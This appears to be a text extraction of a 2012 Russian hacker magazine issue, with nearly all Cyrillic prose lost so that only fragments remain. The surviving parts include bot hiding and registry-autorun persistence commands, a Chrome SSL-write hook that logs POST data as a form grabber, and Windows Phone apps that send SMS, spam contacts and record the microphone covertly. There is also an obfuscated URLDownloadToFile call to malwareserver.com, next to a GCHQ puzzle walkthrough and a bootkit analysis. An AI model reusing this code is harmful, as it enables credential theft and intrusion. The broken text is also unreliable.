- install|vocab_123123123.txt, install
, vocab_123123123.txt
, .
, , clean. brute.

:

results,
.


.
-, ,
, ,
, .
,
: %CD%\bot.exe.
BAT To EXE Converter 1.5
, invisible
application include : bot., (php5ts.dll) (md5.exe).
, . , .
. , , attrib
'+h' '+s'. :
attrib "%CD%\bot.exe" +h +s

.
NTFS :
cd %systemroot%\system32
type packed_bot.exe>calc.exe:b0t.exe

:
brute|c4ca4238a0b923820dcc509a6f75849b:
c81e728d9d4c2f636f067f89cc14862c:eccbc87e4b5ce2fe28308f
d9f2a7baf3

FTP-,
, .
results.
, iamfinished.

cd "%systemroot%\system32
start .\calc.exe:b0t.exe

FTP.
Windows , :
passthru('netsh firewall add allowedprogram %WINDIR%\
system32\ftp.exe TCPInfrastructure>nul 2>&1 ');

exe ( , ,
%systemroot%):
passthru('reg add HKLM\software\microsoft\windows\
currentversion\run /v WinUpdate /t REG_SZ /d
%WINDIR%\packed_bot.exe /f>nul 2>&1');

03 /158/ 2012

PHP , .
,
, , ,
. z

065

plaintext (first@plaintext.su, http://www.plaintext.su)

I can
crack
it!

-,



][-,
. , ,

.

066

DVD


Can You
Crack It?.

03 /158/ 2012

I can crack it!

,

,

,
.
, (GCHQ)

Google, ,
, .

FIRST STEP
,
canyoucrackit.co.uk,
HEX- ( ) - Can
You Crack It?. HEX-,
, ,
ASCII,
.
HEX-
IDA Pro.
- . IDA
x86. ,
.
, .
256 ,
0 255,
,

RC4
8 0xDEADBEEF ( ).
, ,
.
, esp,
,

, ,
0xAAAAAAAA.
DWORD, 0xAAAAAAAA.
,
0xBBBBBBBB.
( ) .

, ,
.
iTXt PNG- ( UTF-8).
Base64
Comment ( ).
, ( )
,
:
GET /15b436de1f9107f3778aad525e5d0b20.js
HTTP/1.1

GET .
, . exe-,

,
( IDA)
:
__asm
{
int 3;
mov eax, array; array
call eax;
}

, jmp ( ) .
. , .

PNG- -

. PNG,
(
).

SECOND STEP

.
,
,
.
, (r0...
r3) ,

(cs ds ), -

UNIX CRYPT()
crypt *nix
,
.

DES (Data
Encryption Standard).
,
, , 7 .
7 56-
DES,
.


DES . .
,
25 .
, crypt ,
DES.
.

12 .

Base64.

keygen

03 /158/ 2012

067


(flg),
(ip).

, (
hlt, )
: mod 0 mod 1. ,

, ,
.

.

, cs ds . , ,
add r[5], 12, ,
,
(

So you did it

cs,
r5).
far jump ip.
, , ,

, ip
.
.

JavaScript, ,
,
. C.
,
, , :-).
(
hlt)
GET:

GET /da75370fe15c4148bd4ceec861fbdaa5.exe
HTTP/1.0

THIRD STEP
GET- , .
,
Cygwin. ,
,
keygen.exe,
.
. keygen URL
. :

licence.txt, ,
.
,
Stage one licence key Stage two licence key,



,
.
-


,
,
. .

,
,
,
,

.
,

,

,

068


- .
, ,

, ,
,
,

.

,
mov, movzx, add, xor, shl, shr
. ., (
).
,

,

.
,
.


(SBox'), ,
,
(
), ,
() . .
-.

,
.
,



(key schedule) /

.
(

key shedule
).

03 /158/ 2012

I can crack it!

,
, .

crypt ( Cygwin)
. ,

, ,
. IP
(URL ) DNS.
, URL :
canyoucrackme.co.uk. keygen.exe GET- :

GET-
:


key.txt,
So you did it
, ,
,
,
, ,
.

SUMMARY
GET /%s/%08X/%08X/%08X/key.txt HTTP/1.0

, - .

,
,
.
,
jump.

DWORD- firmware ( ).
,
,
7z, . , , ,
, .

RC4

GET /hqDTK7b8K2rvw/A3BFC2AF/D2AB1F05/
DA13F110/key.txt HTTP/1.0


,
-
.
,
. , GCHQ
, everyday heroes, ,



.
.
. z

RC4 ( ARC4)


.
,
RSA Security, 1987 . RC4 ,

.
8
,
0 255 (S)
: i j. RC4 :
(KSA)
. S
40 256 . KSA
:
for i from 0 to
S[i] := i
endfor
j := 0
for i from 0 to
j := (j + S[i]
mod 256
swap values of
endfor

255

255
+ key[i mod keylength])
S[i] and S[j]


.
:
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
K := S[(S[i] + S[j]) mod 256]
output K
endwhile

AES

03 /158/ 2012

RC4
SSL,
WEP, Adobe PDF
Microsoft Office. ,

. ,

PDF- RC4
40 ,
.
MS Office -
RC4

069

life4u

:
SMS

INFO


-.
,

.

30 !
-
?
,
SMS, ?
?

070

03 /158/ 2012

SMS: 30 !

? -



, .

, - ,

,
(,
1234).
SMS, -

, .
,
,
. SMS-
SMS-.


,
. SMS

( WebMoney .)
:
(,
) ,

-. SMS
. , , ,
, , -

?
, ,
,
. ,
? ,

.
,
, ,
(
, -!)
,

03 /158/ 2012

.
, ,
.
?


, , ,
.
,

.
(,

,
,
,
),
.

.
,
,
,

.

071


SMS-.
50%
, , , . ,

( , ).
SMS- ,
,
, .
(,
, . .), / (, ,
, -
. .).
.
,
SMS-,
web-
.
,
.


.
SMS-.
, , , . , , .
,

. SMS-
(, ,
),
. ,
.

, (,
).
- (,
) ,
, , , -

depositfiles

072

?


,
.
.
-

,
, - .
,
.
,
(,

),
IP-
,
.


,
.
, , ,
, , ,

,
!

, . SMS- ,
.

( ).
24 , ,
(
,
).
? ,

, , .
50
, ? , ,
( ,
, ).
, ,
,
.
. , -

,
- , ,
?. , ,
SMS,
,
,
.
,
? ? .
,
, .

,
,
?
?
, .
, 1. , ,
( ,
, , ). , .
? , :
,
.
, , , , .
, ,
! , :
.
, ,
, ,
!
,
, -
. ,
, ,
-, ,

03 /158/ 2012

SMS: 30 !


. ,
, !
(welcome back,
!). OK,
, .

.
2.


,
,
.

, ,
,
, ,
.
!
,
,
.
. ,
.
:

?
100 . ,
,
,
.
, ,
-
, ,
( ?)
.
, ,
,
.
, ,
.

.
! , ,
,
.
: http://
loh.ru/?pid=15991&subid=25483.
, . ,
, -
,
.
,
,
,
(
][),
.

. , ,
.
, , .
, ( ).
.
SEO-
. SEO-

, .

.
, , ,
, . .
. (
,
). , ! z


Jinconvert.ru .
: , ,
, ,

. , ! , ,
, 5 %
-.

03 /158/ 2012

Loadpays.ru ,
,
-.
.
,

.

Convert-plus.ru ( info-center.
cc) ,

,
. .

073

(icq 884888, http://snipper.ru)

X-Tools


:
NEOx.
URL:
bit.ly/xSLk8n.
:
Windows.

:
famatech.
URL:
radmin.ru/products/
ipscanner.
:
Windows.

:
Suicide[Vll].
URL:
r00t.in/showthread.
php?t=18056.
:
Windows.

PE TOOLS


ADVANCED IP SCANNER


DEATH-MOBILE

PE Tools PE/PE+ (64bit).


:
PE-, Task Viewer, Win32
PE-, /
. .
1. Task Viewer:
(Full, Partial,
Region);
.NET CLR-;
Anti Dump
Protection;
;
;
PE Editor PE Sniffer;
OEP.
2. PE Sniffer:
/;
;
.
3. PE Rebuilder:
PE-;
PE-.
4. PE Editor:
DOS-;
PE+ (64bit);
CRC;
/
.

- Radmin,

Advanced IP Scanner.
, .
:
1. .
, , , HTTP, HTTPS FTP,
.
2. Radmin. Radmin,
Radmin Server
. ,
,
Radmin Viewer.
3. .

.
4. Wake-On-LAN.
, Wake-On-LAN.

.

SMS,
. 75 120 . ,
, , , .

Mail.Ru. 100 300
.
,

. :

074

mymegaemail@mail.ru:passw
login@bk.ru:pass


, ,
. Death-Mobile

(, , ),
, ,
,
.

.

03 /158/ 2012

X-Tools

:
al-chemist.
URL:
al-chemist.ru/
dnfinder.html.
:
Windows.

:
Z.Razor (ZerveRTeam).
URL:
www.zerverteam.com.
:
Windows.

DOMAIN NAME FINDER,




Domain Name Finder. ,

. ?
,
!
SEO- .
:
, ;

:
Marcello Pietrelli &
Gianni Baini.
URL:
bit.ly/ukWQSX.
:
Windows.

;

;

;
;

(
) - viagra.
com, -
. ,
-
xakepviagra.com: [a-z]{5,5}viagra.com.
!

:
. .
URL:
z-oleg.com/secur/aps.
:
Windows.


WEB TOOL

FILES TERMINATOR

APS !

Web Tool ,
GET- POST-.
,
/// //- . .
(
Data UserAgent)
:


,
. Files Terminator.

,
, ,
.
, , . ,


,
,
.

:
1. .
2. , HMG IS5.
3. .
4. , P50739-95.
5. , DoD
5220.22-M(E).
6. , VSITR.
7. , RCPM TSSIT OPS-II.
8. .
9. .

APS (Anti Port Scanner) ,


. ( ),
.

. ,

(,
web-).
, .
APS
.
,
:
;

;

;
;
, IDS;
, .

#user# ,
#pass# ,
#md5(user)# md5,
#md5(pass)# md5,
#token1# #token(1-X)# ,
#count# .

, , .
(,
, X )
(
< ).
:
1. source-:
nick;pass .
2. : , .
3. :
.

03 /158/ 2012

075

MALWARE

, Senior malware researcher, ESET

2011


. , :
,
,
.

Load MBR

read mode

Load VBR

read mode

load malicious
MBR/VBR

Load bootmgr

read mode/protected mode

NT kernel
modifications

Load winload.exe
or winresume.exe
read mode/protected mode

load rootkit
driver

Load kernel and


boot start drivers

. 1.

076

. 2.

03 /158/ 2012

. 3. VBR

MBR Code

MBR Code

Partition Table Entry #1


Partition Table Entry #2
Partition Table Entry #3
Partition Table Entry #4

Partition Table Entry #1


Partition Table Entry #2
Partition Table Entry #3
Partition Table Entry #4

MBR Data

MBR Data

Bootmgr Partition

Bootmgr Partition

OS Partition

OS Partition

Unpartitioned Space

Olmasco Partition

Before infecting

Empty Partition Entry

After infecting

Active Partition Entry

Existing Partition Entry

. 4. Olmasco


64- . 2010
64- Win64/Olmarik
(TDL4), Rovnix,
ZeroAccess (update), TDL4 (update), Carberp, Olmasco ( MaxSS). ,

03 /158/ 2012

. , . 1.

PoC-,
.
(MBR) ,
, -

077

MALWARE

. 5. Olmasco

. 6. Olmasco

,
.


. - - ,
.
Stuxnet,
Duqu ( Stuxnet). , ,
,

Stuxnet (, , :)).
Duqu .
, ,
0-day- CVE-2011-3402
,
;).

078

--! !
, Olmasco.
, VBR
(Volume Boot Record)
. VBR
, . 3.

,
MBR. , , .

, . .
,
(. 4).

.

03 /158/ 2012

,
.
. 5.

- . 6.
, IDA Hex-Rays
.

.
. 7.
, Olmasco, TDL4,
-, kdcom.dll.
WinDbg,

. :
(
),
kdcom.dll .
- - ,
Bochs
IDA Pro.
, Olmasco ,
TDL4
.

Load drv32 or drv64

mbr is loaded and executed

Call
KdDebuggerInitialize1
from loaded kdcom.dll

Load VBR of
malicious partition

substitute kdcom.dll with


dbg32 or dbg64

infected VBR is loaded and


executed

Load ntoskrnl.exe,
hal.dll, kdcom.dll,
bootvid.dll ant etc

Load \boot from


malicious file system
\boot is loaded and
executed

distrort /MININT option

Hook BIOS int 13h


handler load original
VBR

Load winload.exe

. 8. !

Substitute EmsEnabled
option with Winpe

VBRof originally active partition


is loaded and executed
Bootmgr is
loaded and
executed

Read bcd

. 7. Olmasco

03 /158/ 2012

--! !
Carberp, -.
Carberp ,
.
, .
- Win64/Rovnix,

. Carberp Rovnix -,
.
Carberp ,
.

Continue kernel
initialization

Loal MBR

Load kernel and


boot start drivers

. 9. Carberp

079

MALWARE

. 10. , - Carberp


(. 9).
, .
, . ,
. (
), ,

, .
:

MS10-073 (win32k.sys KeyboardLayout vuln);


MS10-092 (Task Scheduler vuln);





080

. 11. Carberp

MS11-011 (win32k.sys SystemDefaultEUDCFont vuln);


NET Runtime Optimization vuln (http://osvdb.org/show/osvdb/71013).

, , . 10.

-
(. 11).
, .
-
.
user-mode-.

, NtQueueApcThread()/NtResumeThread().
Carberp : -, , dll-,
. , , .
. ,
GMER RKU.
Carberp ,

03 /158/ 2012

success

Check if
already
infected

Loal MBR

fail

Real mode

Check OS
Version

Win 2000

Load VBR
Real mode

Win XP

Vista/Win7

success

Target of Win64\Rovnix

Check Admin
Privileges
fail

Determine OS
Digit Capacity

Load bootstrap code


real mode / protected mod

Load bootmgr
real mode / protected mod

Install Corresponding
Kernel mode Driver

Call ShellExecuteEx
API with runas

Load winload.exe or
winresume.exe

Overwrite Bootstrap
Code of Active Partition

Initiate System Reboot

real mode / protected mod

. 12. Rovnix

,
x86-, x64-. 2012 , ,
.

!
- Rovnix,
, MBR.
. 12.
-, , Bootstrap-, .
Bootstrap ,
VBR (Volume Boot Record), bootmgr.
. Rovnix, Olmasco,
-, ,
Olmasco, ,
, , , , - .
,
,
.

03 /158/ 2012

Load kernel and boot


start drivers

Self Delete and Exit

. 13. Rovnix

, Rovnix , , MBR. , ,
, . ,
.
, SecureBoot Win8,
.

-
,
- .
,
. ,
,
-, ,
,
, . , , , . z

081

MALWARE

yurembo (yazevsoft@gmail.com)




- ,
, . ,
, MS WM6.5,
,
. !

082

INFO


MediaElement
(

mediaSound),
XAML-

: <MediaElement Height="120"
Name="mediaSound"
Width="160" />.

WWW
windowsphonehacker.com
,

WP
77.5.

CD

,

.

03 /158/ 2012

WP , Windows Phone 7.5



, , - (goo.gl/YbIru),
. , (, Facebook).
, ,
!
, ,
.
,
, -
,
. :
- , ,
.
WP 7
-. ( 2012-), ,
, . Microsoft
,
, .


WINDOWS PHONE

, , . :)
, WP 7,
Windows
Phone Marketplace 99 . ChevronTeam ChevronWP7,
.
, .
WP 7, Mango MS WP 7.5,
, ChevronTeam . ,
. , ,
, . , ! :)

. ,
.
, ,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB,
ZuneDriver, Device

Parameter : ShowInShell , PortableDeviceNameSpaceExcludeFromShell ,


EnableLegacySupport .
WP 7
. , , WP 7.5
. , ,
,
(-).


.
, WP (
MS ;)), , -,
, .
WP .NET Silverlight.
,
API. SMS
.
!
, :
using System.Windows.Navigation;

, Microsoft.Phone.
Tasks, SMS (. ). , :
protected override void OnNavigatedTo(NavigationEventArgs e)
{
SmsComposeTask msgSMS = new SmsComposeTask();
msgSMS.Body = " -";

WINDOWS PHONE
, Microsoft .
1. (
.NET Compact), , ()
.
2.
(chamber).
3.
,
, ,
.

03 /158/ 2012

4. . ( ,
, ,
,
?
.)
5.
Windows Phone Marketplace.
6. SSL. ,
, .
7.
ProtectedData ( -

System.Security.Cryptography),
.
8. WP 7 : AES, HMACSHA1,
HMACSHA256, Rfc2898DeriveBytes, RSA,
SHA1, SHA256.
9. , IE,
.
10. , Microsoft,

.

083

MALWARE
msgSMS.To = "1928";
msgSMS.Show();
}

;
.

:)
, ,
:).
, WP 7.5
.
, ,
, . ,
.
. WP- (
, 7.5, SDK
7.1) Silverlight, C#-
Microsoft.Phone.UserData,
.

. , ,
Contacts,
. MainPage InitSearch,
contacts.SearchAsync(String.Empty, FilterKind.DisplayName, null)
.
SearchAsync : (
, ); , ( , ,
None, , ); ,
, null. -


Windows Phone
:
1.

( hash-: = ).
2. .
3. ,

LINQ, / .
,
,
.

ContactsSearchEventArgs.,
SearchCompleted,
MainPage:
contacts.SearchCompleted += new EventHandler<
ContactsSearchEventArgs>(contacts_SearchCompleted)

:
void contacts_SearchCompleted(object sender,
ContactsSearchEventArgs e)
{
int max = e.Results.Count(); //-
string adr;
try { //
for (int i = 0; i < max; i++)
if (e.Results.ElementAt(i).EmailAddresses != null)
{
adr = e.Results.ElementAt(i).
EmailAddresses.First().EmailAddress; //
if (adr != null && adr != "") //
SendEmail(adr); // :)
}
}
catch (Exception ex) { }
}

,
, e-mail- ( ) , ,
SendEmail, .
:
void SendEmail(String adr)
{
EmailComposeTask email = new EmailComposeTask();
email.To = adr;
email.Subject = "Holy mail";
email.Body = "Download my prog";
email.Show();
}

,
( EmailSender).
Overhear2

084

03 /158/ 2012

,
- .
, .
, . ,
! ;)

, , , ,
.
,
(Overhear2, ),
, .
,
Silverlight- WP. C#-
:
using
using
using
using
using

System.IO;
Microsoft.Xna.Framework;
Microsoft.Xna.Framework.Audio;
System.Windows.Threading;
System.IO.IsolatedStorage;

, FrameworkDispatcher ( , ), , , ,
(
, ),
. MainPage (.
). ,
. ,
Windows Phone
, :).
, .
, . (
) .
,
, . recordingStopped ,
, , ,
( ), .

DispatcherTimer .
xna.

xna, :
DispatcherTimer dt = new DispatcherTimer();
dt.Interval = TimeSpan.FromMilliseconds(33);

, ,
: dt.Tick += new EventHandler(dt_Tick).
dt.Start() .
, ,
. ,

(, 10 000 ),
, .
,
SetupMicrophone. ,
. - ,
, , .
,
.
. , . WriteWavHeader ,
. , microphone.Start()
.
.
,
33 . ,
. , ,
recordingStopped .
,
.
( 500 ) microphone_BufferReady.
. recordingStopped , , ,
.
, : , ?
, ,
, .
, , ,
.
SaveFile() (. ), ,
.
private void SaveFile() { //



, ,
()

.
,
.

03 /158/ 2012

,
(dormant), ,

.
(active -> dormant)
tombstoning.
, (terminate)
. ,


:
Launching , Closing
, Deactivating (
) Activating
tombstone. ,

, .

085

MALWARE
using (IsolatedStorageFile isoStorage =
IsolatedStorageFile.GetUserStoreForApplication()){
using (IsolatedStorageFileStream isoStream =
isoStorage.CreateFile(FileName)) {
isoStream.Write(stream.ToArray(), 0,
stream.ToArray().Length);
}
}
}

, ,
.
,
. , wav-.
, :). wav-,
. (goo.gl/ufe3y)
, (
). !
WriteWavHeader,
, ( SetupMicrophone), UpdateWavHeader,
,
, , (
microphone_BufferReady, ,
SaveFile).
wav-. ,
microphone_BufferReady (
recordingStopped), PlayFile
.
:
private void PlayFile() { //
using (var isf =
IsolatedStorageFile.GetUserStoreForApplication()) {
if (isf.FileExists(FileName)) {
using (var isoStream = isf.OpenFile(FileName,
FileMode.Open, FileAccess.Read)) {
mediaSound.Stop();
mediaSound.SetSource(isoStream);
mediaSound.Position=System.TimeSpan.FromSeconds(0);
mediaSound.Volume = 20;
mediaSound.Play();
}
}
}
}

Overhear

,
.
mediaSound.
,
, .
,
.
: , , ( )
( ). Play :
sound = new SoundEffect(stream.ToArray(),
microphone.SampleRate, AudioChannels.Mono);
sound.Play();

! , : , Windows Phone
, . !

Windows Phone 7.5,


.
WP ,
. ,
Marketplace Hub ( ),
. ,
, , ! z


WP 7 .
, ,
. :
1. The Trusted Computing Base (TCB)
.

, - , .

086

, ,
,

Windows Phone Marketplace,

.
2. The Elevated Rights Chamber (ERC) .
,
, ,
.


.
3. The Standard Rights Chamber (SRC)
, MS Office
Mobile, Internet Explorer 9 . .
4. The Least Privileged Chamber (LPC) ,
Microsoft.
, .

03 /158/ 2012

Preview

088

GOOGLE CHROME
,


.
Internet Explorer Mozilla Firefox

.
Google Chrome
, , . -,
,
,

.

094



,

. Python!

UNIXOID

108


Fedora

.
?

SYN\ACK

114



DLP-. - .

03 /158/ 2012

110



Linux-,

.

FERRUM

124



Django-
? .

130

!

. ,
.

087

(seserega@gmail.ru, blotlore.blogspot.com)

Google Chrome



GOOGLE

WWW
goo.gl/Cj4Pl
OllyDbg

.
goo.gl/rdAfo
,
IDA.
goo.gl/uIqMb

,


Chrome.
goo.gl/sZWwZ
.

INFO



__declspec(naked),



.


,

. Internet
Explorer Mozilla Firefox
.
Google Chrome ,
.
088

03 /158/ 2012

Google Chrome

. 1. OllyDbg

, ,

. IE , HttpSendRequest,
wininet.dll, Firefox PR_Write nspr4.dll, ,
.

. 2. SSL-

SRV*c:\code\symbols*http://msdl.microsoft.com/download/
symbols;SRV*c:\code\symbols*http://chromium-browsersymsrv.commondatastorage.googleapis.com

Google Chrome , WSASend. , .


,
SSL- .
OllyDbg
, Google

(goo.gl/8SgW2, Chrome ).
,
, ++.
, , ssl socket.

ssl_socket.h (goo.gl/6cw0w), ,
. , ssl
socket, ssl_client_socket_nss.cc, ssl_
client_socket_openssl.cc ssl_client_socket_win.cc. ,
Firefox PR_Write,
.
ssl_client_socket_nss.cc.
, , .
,
SSLClientSocketWin::Write, - PR_Write. , , :
SSLClientSocketOpenSSL::Write SSLClientSocketWin::Write. .
. Google
Chrome, goo.gl/fwt1S.
, :
1. WinDBG.
2. File Symbol File Path.
3. :

03 /158/ 2012

4.
5.
6.
7.

c:\code\symbols ,
.
View.
Command, Registers Disassembly.
Chrome.
File Attach to a Process...
chrome.exe .

x chrome*!* SSLClientSocketNSS::Write
( Command)
SSLClientSocketNSS::Write, SSLClientSocketWin::Write. (breakpoints) Gmail-.
SSLClientSocketNSS
::Write.
,
int SSLClientSocketNSS::Write(
IOBuffer* buf,
int buf_len,
const CompletionCallback& callback
)

,
POST-. ,
IOBuffer:
class NET_EXPORT IOBuffer :
public base::RefCountedThreadSafe<IOBuffer>
{
public:
IOBuffer();
explicit IOBuffer(int buffer_size);
char* data() { return data_; }
protected:
friend class base::RefCountedThreadSafe<IOBuffer>;
explicit IOBuffer(char* data);
virtual ~IOBuffer();
char* data_;
};

, -

089

. 3. SSL-

,
. OllyDbg
SSLClientSocketNSS::Write (. 1),
DWORD (. 2).
, DWORD ( IOBuffer+8) (char*),
HTTPS- (. 3).
, POST , . ,
SSLClientSocketNSS::Write (. 4).
POST , .
.


,
, .
, ,
, , GetProcAddress
.
PE-, , chrome.exe
chrome.dll. ,
SSLClientSocketNSS::Write dll.
, .

090

- .

. (
, )
14 , chrome.dll .

chrome_1c30000!net::SSLClientSocketNSS::Write:
02875a4c 55
push
ebp
02875a4d 8bec
mov
ebp,esp
02875a4f 51
push
ecx
02875a50 53
push
ebx
02875a51 56
push
esi
02875a52 57
push
edi
02875a53 ff7508
push
dword ptr [ebp+8]
02875a56 8bf1
mov
esi,ecx
02875a58 33db
xor
ebx,ebx


(BYTE*),
, . ,
. ?, x.

03 /158/ 2012

Google Chrome

if(DataCompare((BYTE*)(dwAddress+ i),pbMask,szMask))
return (DWORD)( dwAddress + i );
}
return 0;
}

- , is f*cking unstable.
, , .

. 4. SSLClientSocketNSS::Write

:
char* Sign = "\x55\x8B\xEC\x51\x53\x56\x57\xFF\x75\x08
\x8B\xF1\x33\xDB"; // SSLClientSocketNSS::Write
char* Mask="xxxxxxxxxxxxxx"; //
DWORD SSLAdr = FindPattern(ChromeDLL,
Chrome32Size,
(BYTE*)Sign,
Mask); // SSLAdr - SSLClientSocketNSS::Write

:
bool DataCompare( const BYTE* pData,
const BYTE* bMask, const char* szMask )
{
for( ; *szMask; ++szMask, ++pData, ++bMask )
{
if( *szMask == 'x' && *pData != *bMask )
return false;
}
return ( *szMask ) == NULL;
}
DWORD FindPattern ( DWORD dwAddress,
DWORD dwSize, BYTE* pbMask, char* szMask )
{
for( DWORD i = NULL; i < dwSize; i++ )
{

K, , .
. , , ,
. , , 5 JMP _.
5 ,
JMP. . ,

, , .
. ,
JMP , .
.
.

PAGE_EXECUTE ( VirtualProtect),
5 ( )
. 5 ,
asm- ,
. ,
, -
.
, JMP, [ +
]. ,
JMP _.
,
,
( ).
-, ,
:


. ,
openws akademiker
PR_Write ( - ),
Chrome
Zeus ( , ).
PR_Write
//
char* Sign = "\x8b\x4c\x24\x04\x57\xe8\x00\x00\x00\x00\x8b
\xf8\x85\xff\x75\x05\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xb7
\x38\x02\x00\x00";
//
char* Mask="xxxxxx????xxxxxxxxxxxxxxxxxxx";

03 /158/ 2012

, PR_Write
, combined_
methods, ,
WinDBG SSLClientSocketNSS::DoPayload
Write (. 5).
,
. ,
combined_methods PR_Write
OCh . SpyEye
, .
TranslateMessage, ,
, ZwReadFile,
(
goo.gl/xTX9j). , .

091

. 5. Combined_methods SSLClientSocketNSS::DoPayloadWrite

__declspec (naked) int Hooked_SSLWrite(


DWORD buf,
int buf_len,
void* callback)
{
static bool IsPostData;

WriteLog(LogFile,*(char**)(buf+8));
IsPostData=true;
}
else if ((strncmp((LPCSTR)*(char**)(buf+8),
"GET", lstrlen("GET"))==0)|| IsPostData)
{
WriteLog(LogFile,*(char**)(buf+8));
IsPostData=false;
}

__asm
{
push ebp;
mov ebp,esp;
push ebx;
push esi;
push edi;
push ecx;//argument
}
//
//
ChromeHook.UnsetSplicing();
TrueSSLWrite = (SSLWrite)ChromeHook.GetHookedFunc();
//
__asm
{
pop ecx;//argument
mov eax,callback;
push eax;
mov eax,buf_len;
push eax;
mov eax,buf;
push eax;
call TrueSSLWrite;
push eax;
}
//
ChromeHook.ReSplice();
if((strncmp((LPCSTR)*(char**)(buf+8),
"POST",lstrlen("POST"))==0))
{

092

__asm
{
pop eax;
pop edi;
pop esi;
pop ebx;
leave;
ret 0Ch;
}
}

__declspec(naked) , ,
ex. , ,
, .

thiscall,
(
Write SSLClientSocketNSS). ecx
,
.

-
( DLL-) !
Google Chrome , ,
.
. , ,
. . z

03 /158/ 2012

>> coding

Peter and the Wolf (peterandthewolf@real.xakep.ru)

/++


( )
,
.
, ,
, .


.
WWW
Cog
:
nedbatchelder.com/
code/cog.

INFO

094

,

python-

cog.


.
,
.
? , , ? , ():

URLDownloadToFile(NULL, "http://malwareserver.com/test.exe",
"C:\\test.exe", 0, NULL);

,
URLDownloadToFile,
.rdata .data . hex- . , ,
, - :
URLDownloadToFile(
NULL,
Decrypt("\x0E\x12\x12\x16\x5C ..."),
Decrypt("\x25\x5C\x3A\x12\x03 ..."),
0,
NULL);

,
. - , ,
, .
,
, . (
), - .

PYTHON
, , , -
Cog (http://pypi.python.org/pypi/cogapp).
,

. , , Cog
,
,
. , Cog :
// ++
...
/*[[[cog

03 /158/ 2012

import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
//[[[end]]]
...

:
// ++
...
/*[[[cog
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
void DoSomething();
void DoAnotherThing();
void DoLastThing();
//[[[end]]]
...

python.exe cog.py -r test.cpp, test.


cpp , !
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
Decrypt("\0x0E\0x12\0x12\0x16\0x5C ...")
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
Decrypt("\0x25\0x5C\0x3A\0x12\0x03 ...")
/*[[[end]]]*/,
0,
NULL);

, Visual
Studio , . ,
Encrypt cog-, .

BIN2H
[[[cog ]]] ,
,
]]] [[[end]]]. Cog ,
,
.
, , ,
. ,
.

out outl ( out, ) cog.
,
python-. ,
.



. Cog
xor:
/*[[[cog
import cog
key = 0x66
def Encrypt(str):
cog.out('Decrypt("')
cog.out("".join(['\\' + ("0x%02X" % (ord(char)^key))
for char in str]))
cog.out('")')
]]]
[[[end]]]*/


URLDownloadToFile Encrypt:
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
/*[[[end]]]*/,
0,
NULL);

03 /158/ 2012

, . , Cog

bin2h . bin2h
, , :
def bin2h(filename, valuename):
data = open(filename, 'rb').read()
cog.outl('BYTE %s[] = {' % valuename)
for byte in data:
cog.out('0x%02X, ' % ord(byte))
cog.outl('}')
cog.outl('DWORD %s_size = %d;' % (valuename, len(data)))

, (
PE-), :
//[[[cog bin2h("test.bin", "test")]]]
/*[[[end]]]*/

:
//[[[cog bin2h("test.bin", "test")]]]
BYTE test[] = {
0x23, 0x69, 0x6E, 0x63, 0x6C ...
//
}
DWORD test_size = 7079;
/*[[[end]]]*/,

bin2h
.


, ,
.
, , API . c CorePy
, -
. z

095

(ivinside.blogspot.com)

,



.
, .


-.
40
...

096

, .
- . :
, .
, .
?
... !
... ? .
?
, ,
-- .
!
, .
, . ... ( )
!
?

03 /158/ 2012

, ,
, , --
. : . :) .
13:

, .
, ,
. , , ,
, , .
.
. ,
?

1
1
1
1
1
1
2
2
2
2
3
3
3
4

*
*
*
*
*
*
*
*
*
*
*
*
*
*

1
2
3
4
5
6
2
3
4
5
3
4
5
4

*
*
*
*
*
*
*
*
*
*
*
*
*
*

11 = 11
10 = 20
9 = 27
8 = 32
7 = 35
6 = 36
9 = 36
8 = 48
7 = 56
6 = 60
7 = 63
6 = 72
5 = 75
5 = 80

, . ,
: 1*6*6 2*2*9. ,
, 36,
, ,
. ,
, , ,
. : ,
.
, .
, , .
(1-6-6 2-2-9) .
, , .

( ). :
,
Python.

Oracle.
cx_Oracle,

Oracle.

, ,
:
, ;
, ;
,
.

, , .
, :
,
;
,
.
,
, . ,
:
1.

2.

, ,
, .

Oracle
. , , .

.
test1 test2,
( )
- :
CREATE TABLE test1(prod VARCHAR(10), price INT);
CREATE TABLE test2(prod VARCHAR(10), price INT);

import cx_Oracle
#
conn = cx_Oracle.connect('system/qwerty@XE')
cur = conn.cursor()
#

for line in open('file.txt'):
cur.execute("INSERT INTO test VALUES (:s)", s=line)
# ,
cur.execute('COMMIT')
cur.close()

,

, .

.

03 /158/ 2012

JOIN,
.
LEFT JOIN ,
(), ,
().
. ,
.
WHERE test3.prod IS NULL, , , .
:
SELECT test1.* FROM test1 LEFT JOIN test3
ON test1.prod=test2.prod AND test1.price=test2.price
WHERE test2.prod IS NULL;

,
JOIN, , ,
, -

097


1. ,
,
, None,
.
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}

. .
,
. ,
, ,
. .

, - .
:
. ,
.
, .

2. :
def myappend(a = [], num = 0):
a.append(num)
print a
,
:
>>>
>>>
>>>
>>>
>>>
>>>
>>>

a = [1,2,3]
myappend(a)
myappend()
myappend()
a = {1:2, 3:4}
myappend(*a)
myappend(**a)

3. , .
>>> a =
>>> b =
>>> for
<Keeper

Keeper()
Keeper()
i in Keeper.list_instances(): print i
instance at 0x...

4. ?
389/tcp

open

ldap

, .
, *nix,
, chkrootkit.
, , . Chkrootkit
,
.
rkhunter unhide.
, .
http://goo.gl/9HXEt.
GMER RootRepeal.
, , - ,
.


(IDS intrusion detection system).
. ,
.
Snort
Suricata. , , .
- -
(WAF web application firewall),
.

(Anonymous bind OK)

,
.

,
. , .
.
, . ?

, ,
, .

( ,
. .), .
, ,
,
, .

, : l = 2 * pi * R,
R . ,
. R,
l/2, pi * R.
, , ,
3,14 , , , ,
. , .
, , - ! ,
: , ?

,
: , .
:
3 + 5 = 8
5 + 7 = 12
7 + 11 = 18
...

